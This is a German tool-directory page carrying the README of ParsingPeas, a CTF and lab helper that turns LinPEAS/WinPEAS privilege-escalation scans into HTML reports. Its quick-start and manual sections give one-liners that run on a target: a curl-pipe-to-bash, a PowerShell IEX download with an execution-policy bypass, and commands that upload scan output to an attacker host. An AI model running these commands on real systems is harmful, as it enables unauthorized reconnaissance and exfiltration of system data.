Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ParsingPeas — HTML-Parser für PEAS-Ausgabe mit zusätzlichen Funktionen | Kitploit
Tools/GitHubGitHub/yuvalmil/parsingpeas
Privilege EscalationScripting & AutomatisierungInformationsbeschaffungPost-ExploitationCTFPenetrationstestsDienstprogramme & FrameworksLernen & BildungLabs & Praxis
GitHubyuvalmil/parsingpeas

ParsingPeas

HTML-Parser für PEAS-Ausgabe mit zusätzlichen Funktionen

15914vor 1 MonatVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

ParsingPeas 🥒

Automatische PEASS-Sammlung + ein sauberer, portabler HTML-Bericht für CTF- und Labore zur Privilegienausweitung.

License: MIT Python 3.8+

Führe auf dem Ziel einen Befehl aus. ParsingPeas holt LinPEAS/WinPEAS von deinem Kali-Host, führt den Scan aus, überträgt die Ausgabe zurück und erstellt daraus einen einzigen eigenständigen HTML-Bericht, den du lesen, durchsuchen, sichten und behalten kannst – kein manueller Dateitransfer, kein Internet auf dem Ziel.


Screenshots

Berichtszusammenfassung – Abschnitte nach LinPEAS eigenen Kategorien gruppiert, mit Markierungspunkten und einer Fundleiste:

Zusammenfassung des Berichts

Nur Funde – ein Klick filtert den Bericht und die Seitenleiste auf Abschnitte mit kritischen/hohen Treffern:

Nur Funde

Vollständige Terminalausgabe – der komplette, originalgetreu farbige Scan; durchsuchbar mit Strg-F:

Vollständige Terminalausgabe


Warum

Die rohe PEASS-Ausgabe ist eine endlose Wand aus Terminaltext, die verschwindet, sobald deine Shell stirbt. ParsingPeas:

  • Automatisiert die Fleißarbeit – kein scp, kein selbst hosten von linpeas, kein Kopieren und Einfügen der Ausgabe zurück nach Kali.
  • Speichert sie – jeder Scan wird zu einem zeitgestempelten HTML-Bericht auf deinem Host.
  • Macht sie navigierbar – die Ausgabe wird in LinPEAS echten Abschnitte aufgeteilt, mit kategorisierter Seitenleiste, Fundhervorhebungen und Volltextsuche.
  • Reist gut – jeder Bericht ist eine einzige eigenständige .html-Datei, die du von der Box kopieren, archivieren oder offline per Doppelklick öffnen kannst.

Es ist Präsentation + Logistik, nicht eine Exploit-Engine: Es bewahrt getreulich PEASS eigene Farbgebung und Funde, anstatt sie zu hinterfragen.


Funktionen

  • Einzeiler-Workflow – das Ziel lädt den Wrapper von deinem Host herunter, führt PEASS aus und sendet das Ergebnis automatisch per POST zurück.
  • Funktioniert offline auf dem Ziel – alles wird von deinem Kali-Host bereitgestellt.
  • Getreue Abschnittsanalyse – folgt LinPEAS echter zweistufiger Header-Hierarchie (Hauptabschnitte + Unterprüfungen); Hacktricks-Links und Prüfzeilen bleiben als Inhalt erhalten, anstatt das Inhaltsverzeichnis zu verschmutzen.
  • Eigenständige Berichte – Terminalausgabe ist inline eingebettet; eine Datei, keine Nebenläufe, öffnet sich über file://.
  • Interaktive Berichtsansicht:
    • Seitenleisten-Inhaltsverzeichnis, gruppiert nach PEASS eigenen Abschnitten, mit Anzahl kritischer/hoher Funde.
    • Fundleiste – N kritisch / N hoch-Chips, die zwischen markierten Abschnitten springen, plus Farblegende.
    • Nur Funde-Filter für schnelles Sichten.
    • Zeilenumbruch-Schalter (standardmäßig an – keine abgeschnittenen Zeilen mehr).
    • Scrollspy – aktueller Abschnitt wird beim Scrollen im Inhaltsverzeichnis hervorgehoben.
    • Klebende Abschnittsüberschriften und „als gelesen markieren“-Punkte, die dauerhaft bleiben (localStorage, pro Bericht).
    • Header-Abzeichen für den aktuellen Benutzer (rot, wenn root) und Betriebssystem.
  • Vollständiger Terminalausgabe-Tab – der komplette, vollständig farbige Scan, in einem Durchlauf gerendert, sodass die Strg-F des Browsers alles durchsucht.
  • Gedämpftes dunkles Design – augenschonend für lange Sitzungen.
  • Linux und Windows – LinPEAS (bash) und WinPEAS (PowerShell).

Schnellstart

Auf deinem Kali-Host

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # lädt LinPEAS + WinPEAS in scripts/ herunter
pip3 install -r requirements.txt
python3 receiver.py             # startet auf http://0.0.0.0:8005

Lasse receiver.py laufen. Finde die IP, unter der das Ziel dich erreichen kann:

  • HTB / VPN: deine tun0-Adresse – ip -4 addr show tun0
  • LAN: deine normale Schnittstellen-IP

Auf dem Ziel

Linux/Unix (verwendet curl, fällt auf wget zurück):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows (PowerShell / Reverse-Shell):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

Wähle den Einzeiler, der zum Ziel-Betriebssystem passt – Linux liefert LinPEAS, Windows WinPEAS.

Bericht ansehen

Berichte werden auf deinem Kali-Host in ./reports/ erstellt. Entweder:

  • Durchstöbere das Verzeichnis unter http://YOUR_KALI_IP:8005 und klicke auf einen Bericht, oder
  • Öffne die generierte Datei direkt – sie ist eigenständig:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

Kopiere diese einzelne .html-Datei beliebig – sie funktioniert eigenständig.


So funktioniert es

root@kitploit:~
Ziel → lädt Wrapper von Kali herunter → führt PEASS aus → sendet Ausgabe per POST → Kali parst → eigenständiger HTML-Bericht

Das Ziel benötigt niemals Internet – der Wrapper und die PEASS-Binärdateien werden alle von deinem Host bereitgestellt.


Verwendung des Berichts

  • Berichtszusammenfassung-Tab – Abschnitte nach PEASS-Kategorie in der Seitenleiste gruppiert. Rote/gelbe Punkte markieren Abschnitte mit kritischen/hohen Funden. Verwende die Funde-Chips, um direkt zu ihnen zu springen, oder Nur Funde, um alles andere auszublenden.
  • Vollständige Terminalausgabe-Tab – der komplette farbige Scan. Drücke einfach Strg-F zum Suchen; die gesamte Ausgabe ist gerendert, sodass die native Suche alles abdeckt.
  • Klicke auf einen Fundpunkt, um einen Abschnitt als gelesen zu markieren – er bleibt gelesen, wenn du den Bericht erneut öffnest.

Manuelle Nutzung

Wenn der Einzeiler fehlschlägt, erledige es manuell.

Linux:

root@kitploit:~
# Auf dem Ziel
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Zurücksenden
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

Verarbeiten eines bereits vorhandenen PEASS-Dumps:

root@kitploit:~
python3 parser.py /pfad/zu/peas_output.txt   # schreibt einen HTML-Bericht nach ./reports/

Konfiguration

Bearbeite den oberen Teil von receiver.py:


Fehlerbehebung

  • Kann das Skript nicht herunterladen? curl http://KALI_IP:8005/health, um die Konnektivität zu prüfen; öffne die Firewall mit sudo ufw allow 8005/tcp.
  • 404 auf /get-linpeas? Führe ./setup.sh aus, um die PEASS-Binärdateien zu holen.
  • Keine Live-Ausgabe in einer PowerShell-Reverse-Shell? Erwartet – der Scan läuft trotzdem; beobachte deinen Empfänger auf die Upload-Bestätigung.

Sicherheit

⚠️ Nur für autorisierte Penetrationstests, CTFs und Labore.

  • Keine Authentifizierung – führe es nur in isolierten/CTF-Netzwerken hinter einer Firewall aus.
  • Upload-Header-Werte werden bereinigt, und Uploads sind größenbegrenzt, aber der Server ist nicht für feindliche Internetbelastung gehärtet.

Danksagungen

Erstellt auf Basis von PEASS-ng von @carlospolop. ParsingPeas sammelt und präsentiert nur dessen Ausgabe.


MIT-Lizenz · Beiträge willkommen

Tool herunterladen
EinstellungStandardwertAnmerkungen
Port8005ändere die Zeile app.run(... port=...)
OUTPUT_DIR./received_outputsrohe hochgeladene Scans
REPORTS_DIR./reportsgenerierte HTML-Berichte
SCRIPTS_DIR./scriptsLinPEAS/WinPEAS-Binärdateien
MAX_UPLOAD_SIZE10 MBdurchgesetzt – größere Uploads erhalten HTTP 413